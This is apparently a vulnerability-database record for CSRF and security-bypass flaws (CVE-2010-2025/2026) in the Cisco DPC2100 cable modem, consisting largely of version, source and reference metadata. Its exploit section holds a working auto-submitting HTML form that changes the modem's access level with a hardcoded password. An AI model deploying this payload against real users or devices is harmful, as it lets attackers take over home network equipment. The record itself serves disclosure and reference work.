Sign-up

ID

VAR-E-201005-0342


CVE

cve_id:CVE-2010-2025

Trust: 2.4

cve_id:CVE-2010-2026

Trust: 0.8

sources: BID: 40346 // PACKETSTORM: 89916 // EXPLOIT-DB: 34033 // EDBNET: 55415

EDB ID

34033


TITLE

Cisco DPC2100 2.0.2 r1256-060303 - Multiple Security Bypass / Cross-Site Request Forgery Vulnerabilities - Hardware remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 34033

DESCRIPTION

Cisco DPC2100 2.0.2 r1256-060303 - Multiple Security Bypass / Cross-Site Request Forgery Vulnerabilities. CVE-2010-2025CVE-64941 . remote exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 34033

AFFECTED PRODUCTS

vendor:ciscomodel:dpc2100 r1256-060303scope:eqversion:2.0.2

Trust: 1.6

vendor:scientificmodel:atlanta dpc2100 cable modemscope: - version: -

Trust: 0.5

vendor:ciscomodel:dpc2100r2 r1256-060303scope:eqversion:2.0.2

Trust: 0.3

vendor:ciscomodel:dpc2100r2 r1256-100324asscope:neversion:2.0.2

Trust: 0.3

sources: BID: 40346 // PACKETSTORM: 89916 // EXPLOIT-DB: 34033 // EDBNET: 55415

EXPLOIT

source: https://www.securityfocus.com/bid/40346/info

Cisco DPC2100 (formerly Scientific Atlanta DPC2100) is prone to multiple security-bypass and cross-site request-forgery vulnerabilities.

Successful exploits may allow attackers to run privileged commands on the affected device, change configuration settings, modify device firmware, cause denial-of-service conditions, or inject arbitrary script code. Other attacks are also possible.

Firmware versions prior to 2.0.2.r1256-100324as are vulnerable.

<html> <head> <title>Test for CSRF vulnerability in WebSTAR modems</title> </head> <body> <form name="csrf" method="post" action="http://192.168.100.1/goform/_aslvl"> <input type="hidden" name="SAAccessLevel" value="0"> <input type="hidden" name="SAPassword" value="W2402"> </form> <script>document.csrf.submit()</script> </body> </html>

Trust: 1.0

sources: EXPLOIT-DB: 34033

EXPLOIT LANGUAGE

html

Trust: 0.6

sources: EXPLOIT-DB: 34033

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 34033

TYPE

Multiple Security Bypass / Cross-Site Request Forgery Vulnerabilities

Trust: 1.0

sources: EXPLOIT-DB: 34033

TAGS

tag:exploit

Trust: 0.5

tag:vulnerability

Trust: 0.5

tag:csrf

Trust: 0.5

sources: PACKETSTORM: 89916

CREDITS

Dan Rosenberg

Trust: 0.6

sources: EXPLOIT-DB: 34033

EXTERNAL IDS

db:NVDid:CVE-2010-2025

Trust: 2.4

db:EXPLOIT-DBid:34033

Trust: 1.9

db:BIDid:40346

Trust: 1.9

db:NVDid:CVE-2010-2026

Trust: 0.8

db:EDBNETid:55415

Trust: 0.6

db:PACKETSTORMid:89916

Trust: 0.5

sources: BID: 40346 // PACKETSTORM: 89916 // EXPLOIT-DB: 34033 // EDBNET: 55415

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2010-2025

Trust: 2.1

url:https://www.securityfocus.com/bid/40346/info

Trust: 1.0

url:https://www.exploit-db.com/exploits/34033/

Trust: 0.6

url:https://nvd.nist.gov/vuln/detail/cve-2010-2026

Trust: 0.5

url:http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0322.html

Trust: 0.3

url:http://www.cisco.com/

Trust: 0.3

url:https://www.exploit-db.com/exploits/34033

Trust: 0.3

sources: BID: 40346 // PACKETSTORM: 89916 // EXPLOIT-DB: 34033 // EDBNET: 55415

SOURCES

db:BIDid:40346
db:PACKETSTORMid:89916
db:EXPLOIT-DBid:34033
db:EDBNETid:55415

LAST UPDATE DATE

2022-07-27T09:30:46.267000+00:00


SOURCES UPDATE DATE

db:BIDid:40346date:2010-05-24T19:32:00

SOURCES RELEASE DATE

db:BIDid:40346date:2010-05-24T00:00:00
db:PACKETSTORMid:89916date:2010-05-25T21:34:37
db:EXPLOIT-DBid:34033date:2010-05-24T00:00:00
db:EDBNETid:55415date:2010-05-24T00:00:00